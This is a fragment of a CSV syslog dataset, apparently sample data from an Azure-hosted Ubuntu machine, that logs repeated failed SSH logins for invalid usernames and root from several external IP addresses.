+4292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:52,UbuntuDevEnv,2019-06-26 14:17:52,auth,UbuntuDevEnv,info,Disconnected from invalid user gitlab 180.76.96.9 port 50770 [preauth],6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,180.76.96.9,50770,,
+4293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:52,UbuntuDevEnv,2019-06-26 14:17:52,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 50770:11: Bye Bye [preauth],6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,50770,,
+4294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:27,UbuntuDevEnv,2019-06-26 14:18:27,auth,UbuntuDevEnv,info,Invalid user profile from 68.183.50.149 port 56366,6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,profile,68.183.50.1,56366,,
+4295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:27,UbuntuDevEnv,2019-06-26 14:18:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:27,UbuntuDevEnv,2019-06-26 14:18:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:29,UbuntuDevEnv,2019-06-26 14:18:29,auth,UbuntuDevEnv,info,Failed password for invalid user profile from 68.183.50.149 port 56366 ssh2,6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,profile,68.183.50.1,56366,,
+4298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:29,UbuntuDevEnv,2019-06-26 14:18:29,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56366:11: Bye Bye [preauth],6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56366,,
+4299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:29,UbuntuDevEnv,2019-06-26 14:18:29,auth,UbuntuDevEnv,info,Disconnected from invalid user profile 68.183.50.149 port 56366 [preauth],6281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,profile,68.183.50.1,56366,,
+4300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:31,UbuntuDevEnv,2019-06-26 14:18:31,auth,UbuntuDevEnv,info,Invalid user odoo from 180.76.96.9 port 55882,6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,180.76.96.9,55882,,
+4301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:31,UbuntuDevEnv,2019-06-26 14:18:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:31,UbuntuDevEnv,2019-06-26 14:18:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:33,UbuntuDevEnv,2019-06-26 14:18:33,auth,UbuntuDevEnv,info,Failed password for invalid user odoo from 180.76.96.9 port 55882 ssh2,6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,180.76.96.9,55882,,
+4304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:34,UbuntuDevEnv,2019-06-26 14:18:33,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 55882:11: Bye Bye [preauth],6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,55882,,
+4305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:18:34,UbuntuDevEnv,2019-06-26 14:18:33,auth,UbuntuDevEnv,info,Disconnected from invalid user odoo 180.76.96.9 port 55882 [preauth],6285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,180.76.96.9,55882,,
+4306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:15,UbuntuDevEnv,2019-06-26 14:19:14,auth,UbuntuDevEnv,info,Invalid user connor from 180.76.96.9 port 60976,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,180.76.96.9,60976,,
+4307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:15,UbuntuDevEnv,2019-06-26 14:19:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:15,UbuntuDevEnv,2019-06-26 14:19:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:16,UbuntuDevEnv,2019-06-26 14:19:16,auth,UbuntuDevEnv,info,Failed password for invalid user connor from 180.76.96.9 port 60976 ssh2,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,180.76.96.9,60976,,
+4310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:17,UbuntuDevEnv,2019-06-26 14:19:16,auth,UbuntuDevEnv,info,Disconnected from invalid user connor 180.76.96.9 port 60976 [preauth],6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,connor,180.76.96.9,60976,,
+4311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:17,UbuntuDevEnv,2019-06-26 14:19:16,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 60976:11: Bye Bye [preauth],6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,60976,,
+4312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:38,UbuntuDevEnv,2019-06-26 14:19:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111  user=root,6587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,220.134.138.1,,0,
+4313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:40,UbuntuDevEnv,2019-06-26 14:19:39,auth,UbuntuDevEnv,info,Failed password for root from 220.134.138.111 port 58416 ssh2,6587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,58416,,
+4314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:40,UbuntuDevEnv,2019-06-26 14:19:40,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 220.134.138.111 port 58416 [preauth],6587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,220.134.138.1,58416,,
+4315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:40,UbuntuDevEnv,2019-06-26 14:19:40,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 58416:11: Bye Bye [preauth],6587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,58416,,
+4316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:56,UbuntuDevEnv,2019-06-26 14:19:55,auth,UbuntuDevEnv,info,Invalid user git from 68.183.50.149 port 45082,6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,68.183.50.1,45082,,
+4317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:56,UbuntuDevEnv,2019-06-26 14:19:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:56,UbuntuDevEnv,2019-06-26 14:19:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:57,UbuntuDevEnv,2019-06-26 14:19:56,auth,UbuntuDevEnv,info,Invalid user haproxy from 180.76.96.9 port 37832,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,180.76.96.9,37832,,
+4320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:57,UbuntuDevEnv,2019-06-26 14:19:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:57,UbuntuDevEnv,2019-06-26 14:19:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:58,UbuntuDevEnv,2019-06-26 14:19:57,auth,UbuntuDevEnv,info,Failed password for invalid user git from 68.183.50.149 port 45082 ssh2,6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,68.183.50.1,45082,,
+4323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:58,UbuntuDevEnv,2019-06-26 14:19:57,auth,UbuntuDevEnv,info,Disconnected from invalid user git 68.183.50.149 port 45082 [preauth],6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,68.183.50.1,45082,,
+4324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:58,UbuntuDevEnv,2019-06-26 14:19:57,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 45082:11: Bye Bye [preauth],6655,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,45082,,
+4325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:58,auth,UbuntuDevEnv,info,Failed password for invalid user haproxy from 180.76.96.9 port 37832 ssh2,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,180.76.96.9,37832,,
+4326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:59,auth,UbuntuDevEnv,info,Invalid user lab from 196.46.36.144 port 37974,6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lab,196.46.36.1,37974,,
+4327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:59,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 37832:11: Bye Bye [preauth],6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,37832,,
+4330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:19:59,UbuntuDevEnv,2019-06-26 14:19:59,auth,UbuntuDevEnv,info,Disconnected from invalid user haproxy 180.76.96.9 port 37832 [preauth],6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,haproxy,180.76.96.9,37832,,
+4331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:01,UbuntuDevEnv,2019-06-26 14:20:01,auth,UbuntuDevEnv,info,Failed password for invalid user lab from 196.46.36.144 port 37974 ssh2,6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lab,196.46.36.1,37974,,
+4332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:02,UbuntuDevEnv,2019-06-26 14:20:01,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 37974:11: Bye Bye [preauth],6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,37974,,
+4333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:02,UbuntuDevEnv,2019-06-26 14:20:01,auth,UbuntuDevEnv,info,Disconnected from invalid user lab 196.46.36.144 port 37974 [preauth],6659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lab,196.46.36.1,37974,,
+4334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:41,UbuntuDevEnv,2019-06-26 14:20:40,auth,UbuntuDevEnv,info,Invalid user nero from 180.76.96.9 port 42934,6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,180.76.96.9,42934,,
+4335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:41,UbuntuDevEnv,2019-06-26 14:20:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:41,UbuntuDevEnv,2019-06-26 14:20:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:43,UbuntuDevEnv,2019-06-26 14:20:42,auth,UbuntuDevEnv,info,Failed password for invalid user nero from 180.76.96.9 port 42934 ssh2,6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,180.76.96.9,42934,,
+4338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:43,UbuntuDevEnv,2019-06-26 14:20:43,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 42934:11: Bye Bye [preauth],6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,42934,,
+4339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:20:43,UbuntuDevEnv,2019-06-26 14:20:43,auth,UbuntuDevEnv,info,Disconnected from invalid user nero 180.76.96.9 port 42934 [preauth],6813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nero,180.76.96.9,42934,,
+4340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:23,UbuntuDevEnv,2019-06-26 14:21:22,auth,UbuntuDevEnv,info,Invalid user pentecote from 180.76.96.9 port 48028,7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,180.76.96.9,48028,,
+4341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:23,UbuntuDevEnv,2019-06-26 14:21:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:23,UbuntuDevEnv,2019-06-26 14:21:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:25,UbuntuDevEnv,2019-06-26 14:21:24,auth,UbuntuDevEnv,info,Failed password for invalid user pentecote from 180.76.96.9 port 48028 ssh2,7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,180.76.96.9,48028,,
+4344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:25,UbuntuDevEnv,2019-06-26 14:21:24,auth,UbuntuDevEnv,info,Disconnected from invalid user pentecote 180.76.96.9 port 48028 [preauth],7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,180.76.96.9,48028,,
+4345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:25,UbuntuDevEnv,2019-06-26 14:21:24,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 48028:11: Bye Bye [preauth],7275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,48028,,
+4346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:27,UbuntuDevEnv,2019-06-26 14:21:26,auth,UbuntuDevEnv,info,Invalid user yuanwd from 220.134.138.111 port 47280,7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,220.134.138.1,47280,,
+4347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:27,UbuntuDevEnv,2019-06-26 14:21:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:27,UbuntuDevEnv,2019-06-26 14:21:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:28,UbuntuDevEnv,2019-06-26 14:21:28,auth,UbuntuDevEnv,info,Invalid user ts3srv from 68.183.50.149 port 33802,7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,68.183.50.1,33802,,
+4350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:28,UbuntuDevEnv,2019-06-26 14:21:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:28,UbuntuDevEnv,2019-06-26 14:21:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
